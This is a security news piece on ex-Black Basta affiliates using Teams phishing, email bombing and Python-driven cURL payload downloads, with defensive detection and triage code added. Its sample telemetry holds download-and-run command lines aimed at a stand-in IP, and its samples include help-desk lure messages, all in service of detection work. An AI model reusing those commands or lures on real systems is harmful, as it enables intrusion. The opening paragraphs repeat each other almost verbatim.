Ex-Black Basta Members Employ Microsoft Teams and Python Scripts in 2025 Cyber Attacks

June 11, 2025
Ransomware / Cybersecurity

Former affiliates of the Black Basta ransomware group are reportedly sticking to familiar tactics, using email bombing and Microsoft Teams phishing to gain initial access to targeted networks. Recent reports from ReliaQuest, shared with The Hacker News, reveal that the attackers have added Python script execution to these methods, using cURL requests to retrieve and deploy malicious payloads. This evolution indicates that the threat actors are adapting and regrouping despite the blow to the Black Basta brand that followed the public leak of its internal chat logs in February. The firm found that 50% of the Teams phishing incidents it recorded between February and May 2025 originated from onmicrosoft[.]com domains, with breached domains behind 42% of all attacks in that period. Both approaches are hard to spot, because the messages arrive from what look like legitimate Microsoft 365 tenants.

Former affiliates of the Black Basta ransomware group have resumed operations, and recent attacks show a continued reliance on proven methods, email bombing and phishing through Microsoft Teams, to gain initial access to targeted networks. A report from cybersecurity firm ReliaQuest, shared with The Hacker News, documents these developments and an evolution in the attackers' tradecraft.

The attackers have expanded their toolkit by incorporating Python script execution, using the scripts to issue cURL commands that retrieve and install malicious payloads on compromised systems. The shift underscores the adaptability of the threat actors, who have kept operating despite the setbacks Black Basta suffered after its internal chat logs leaked earlier this year.
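The Python-plus-cURL chain described above leaves a distinctive shape in process-creation telemetry: a Python interpreter either spawns curl with a remote URL or carries the curl invocation inside its own command line. The following is an added detection example written for this article, not code from the ReliaQuest report or from the attackers; it runs over a handful of constructed, Sysmon-style events (hostnames, paths and the 198.51.100.0/24 documentation-range IP are made up) and returns the events that match either pattern.

```python
import re
from typing import Dict, List, Optional

# Process names that count as a Python interpreter or as cURL (lower-cased file names).
PYTHON_IMAGES = {"python.exe", "pythonw.exe", "python3.exe", "python", "python3"}
CURL_IMAGES = {"curl.exe", "curl"}
# A remote URL on the command line; stops at whitespace or a quote character.
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# The word "curl" or "curl.exe" anywhere in a command line.
CURL_WORD_RE = re.compile(r"\bcurl(?:\.exe)?\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Reduce a Windows or POSIX path to its lower-cased file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Dict) -> Optional[Dict]:
    """Return a finding when a Python process drives a cURL download, else None."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    urls = URL_RE.findall(cmd)
    if not urls:
        return None  # no remote URL on the command line: curl --version, pip, etc.
    if parent in PYTHON_IMAGES and image in CURL_IMAGES:
        rule = "python-spawns-curl"  # script runs curl as a child process
    elif image in PYTHON_IMAGES and CURL_WORD_RE.search(cmd):
        rule = "python-inline-curl"  # python -c "...os.system('curl ...')" style one-liner
    else:
        return None
    return {"rule": rule, "host": event.get("Computer", "?"), "url": urls[0], "cmd": cmd}


def triage(events: List[Dict]) -> List[Dict]:
    """Run classify() over a batch of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample telemetry (assumed Sysmon-like field names; nothing here is real data).
SAMPLE_EVENTS = [
    {   # malicious: a Python script spawns curl to pull a payload from a remote host
        "Computer": "WS-FIN-07",
        "ParentImage": r"C:\Users\jsmith\AppData\Local\Programs\Python\Python312\python.exe",
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl.exe -s -o C:\Users\Public\svc.exe https://198.51.100.23/u/svc.exe",
    },
    {   # malicious: a Python one-liner that shells out to curl inline
        "Computer": "build-03",
        "ParentImage": "/bin/bash",
        "Image": "/usr/bin/python3",
        "CommandLine": "python3 -c \"import subprocess;subprocess.run(['curl','-fsSL',"
                       "'https://198.51.100.23/a.sh','-o','/tmp/a.sh'])\"",
    },
    {   # benign: Python spawns curl, but there is no remote URL to fetch
        "Computer": "WS-FIN-07",
        "ParentImage": r"C:\Python312\python.exe",
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": "curl.exe --version",
    },
    {   # out of scope for this rule: a curl download with no Python in the chain
        "Computer": "WS-HR-02",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": "curl.exe -O https://updates.example/tool.zip",
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding['rule']}] {finding['host']}: {finding['url']}")
```

The fourth event shows the rule's deliberate boundary: it keys on the Python interpreter the article names, so a curl download launched from cmd.exe or PowerShell is left to a broader ingress-tool-transfer rule. In production the URL host would also be checked against an allow-list of update servers before the finding is raised.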

From February to May 2025, half of the Teams phishing attempts ReliaQuest recorded originated from onmicrosoft[.]com domains, the default tenant domain Microsoft assigns to every new Microsoft 365 tenant, which lets an attacker stand up a convincing sender in minutes. A further 42% of the phishing incidents in that window came from breached domains, letting the perpetrators pose as legitimate organizations. Both tactics make the messages look like ordinary cross-tenant traffic, which makes detection and mitigation harder for the targeted organization.
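The two sender populations above call for different checks: an onmicrosoft[.]com tenant domain is a cheap signal on its own, while a breached legitimate domain defeats any domain-only filter and has to be caught by the rest of the message (an unexpected external first contact, an IT-sounding display name, a "your mailbox is full of spam, let us remote in" lure). The following is an added triage example written for this article, not code from ReliaQuest or Microsoft; it assumes Teams chat messages exported as dicts with a sender UPN, display name, an is_external flag and the message text, and a hypothetical KNOWN_PARTNER_DOMAINS set listing the tenants your organization actually federates with.

```python
from typing import Dict, List

# Assumption: the vetted external tenants this organization expects to hear from.
KNOWN_PARTNER_DOMAINS = {"partner.example"}
# Display-name fragments attackers use to pass as internal IT.
IT_IMPERSONATION = ("help desk", "helpdesk", "service desk", "it support", "it admin", "security team")
# Vocabulary of the email-bombing follow-up lure and the remote-access ask.
LURE_TERMS = ("spam", "mailbox", "quick assist", "anydesk", "teamviewer", "remote session", "verify")


def sender_domain(upn: str) -> str:
    """Domain part of a user principal name, lower-cased."""
    return upn.rsplit("@", 1)[-1].lower()


def assess_message(msg: Dict) -> Dict:
    """Score one Teams message; each independent signal adds one point and a reason."""
    reasons: List[str] = []
    if not msg.get("is_external", False):
        return {"sender": msg["sender"], "score": 0, "reasons": reasons}
    domain = sender_domain(msg["sender"])
    if domain.endswith(".onmicrosoft.com"):
        reasons.append("sender uses a default *.onmicrosoft.com tenant domain")
    if domain not in KNOWN_PARTNER_DOMAINS:
        reasons.append("external domain is not a vetted partner (first contact)")
    name = msg.get("display_name", "").lower()
    if any(term in name for term in IT_IMPERSONATION):
        reasons.append("display name impersonates internal IT / help desk")
    text = msg.get("text", "").lower()
    hits = [t for t in LURE_TERMS if t in text]
    if hits:
        reasons.append("lure vocabulary: " + ", ".join(hits))
    return {"sender": msg["sender"], "score": len(reasons), "reasons": reasons}


def rank(messages: List[Dict]) -> List[Dict]:
    """Highest-scoring messages first; stable sort keeps export order among ties."""
    return sorted((assess_message(m) for m in messages), key=lambda r: r["score"], reverse=True)


# Constructed sample messages (all senders, names and text are made up).
SAMPLE_MESSAGES = [
    {   # throwaway tenant on the default domain, posing as the help desk
        "sender": "helpdesk@contoso-support.onmicrosoft.com", "display_name": "IT Help Desk",
        "is_external": True,
        "text": "We are seeing spam flooding your mailbox. Please open Quick Assist so we can fix it.",
    },
    {   # breached legitimate domain: the domain check is silent, the other signals are not
        "sender": "m.ortiz@acme-law.example", "display_name": "Service Desk",
        "is_external": True,
        "text": "Your mailbox is over quota, please start a remote session with AnyDesk.",
    },
    {   # vetted partner, ordinary business content
        "sender": "dana.reyes@partner.example", "display_name": "Dana Reyes",
        "is_external": True,
        "text": "Attaching the revised Q3 invoice, thanks.",
    },
    {   # internal colleague: external-sender checks do not apply
        "sender": "sam.lee@corp.example", "display_name": "Sam Lee",
        "is_external": False,
        "text": "Can you verify the mailbox rule I set up?",
    },
]

if __name__ == "__main__":
    for result in rank(SAMPLE_MESSAGES):
        print(result["score"], result["sender"], "; ".join(result["reasons"]))
```

The second sample is the case the 42% figure describes: acme-law.example is a plausible domain and passes the onmicrosoft[.]com check, yet it still scores on first contact, an impersonating display name and the lure vocabulary. The domain allow-list is also the administrative control: restricting Teams external access to the tenants in KNOWN_PARTNER_DOMAINS blocks the throwaway onmicrosoft[.]com tenants outright, and the content checks remain for anything that gets through.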

As these attackers refine their methods, the implications for organizations, particularly those in the United States, can be profound. The techniques described map cleanly onto the MITRE ATT&CK framework: Initial Access via Phishing (T1566), with the email bomb as the pretext and the Teams chat as the delivery channel; Execution via Command and Scripting Interpreter: Python (T1059.006); and Command and Control via Ingress Tool Transfer (T1105) for the cURL downloads. Credential dumping, where it follows, is OS Credential Dumping (T1003) under Credential Access; it is not a persistence technique.

Understanding these tactics is crucial for business owners seeking to bolster their cybersecurity defenses. The ability to recognize potential attack vectors, such as Teams phishing and email bombing, can empower organizations to implement better preventive measures. By fostering a culture of security awareness and enhancing technical safeguards, businesses can mitigate the risks posed by these evolving threats.

As the cyber threat landscape continues to evolve, vigilance remains paramount. Companies must not only invest in advanced cybersecurity technologies but also prioritize continuous training for employees to identify and respond to potential phishing attempts. Keeping abreast of the latest tactics and techniques will be essential for maintaining robust defenses against the persistent threat posed by groups adapting to new technologies and strategies. The convergence of traditional phishing methods with innovative scripting techniques signals an ongoing challenge that the cybersecurity community must confront head-on.
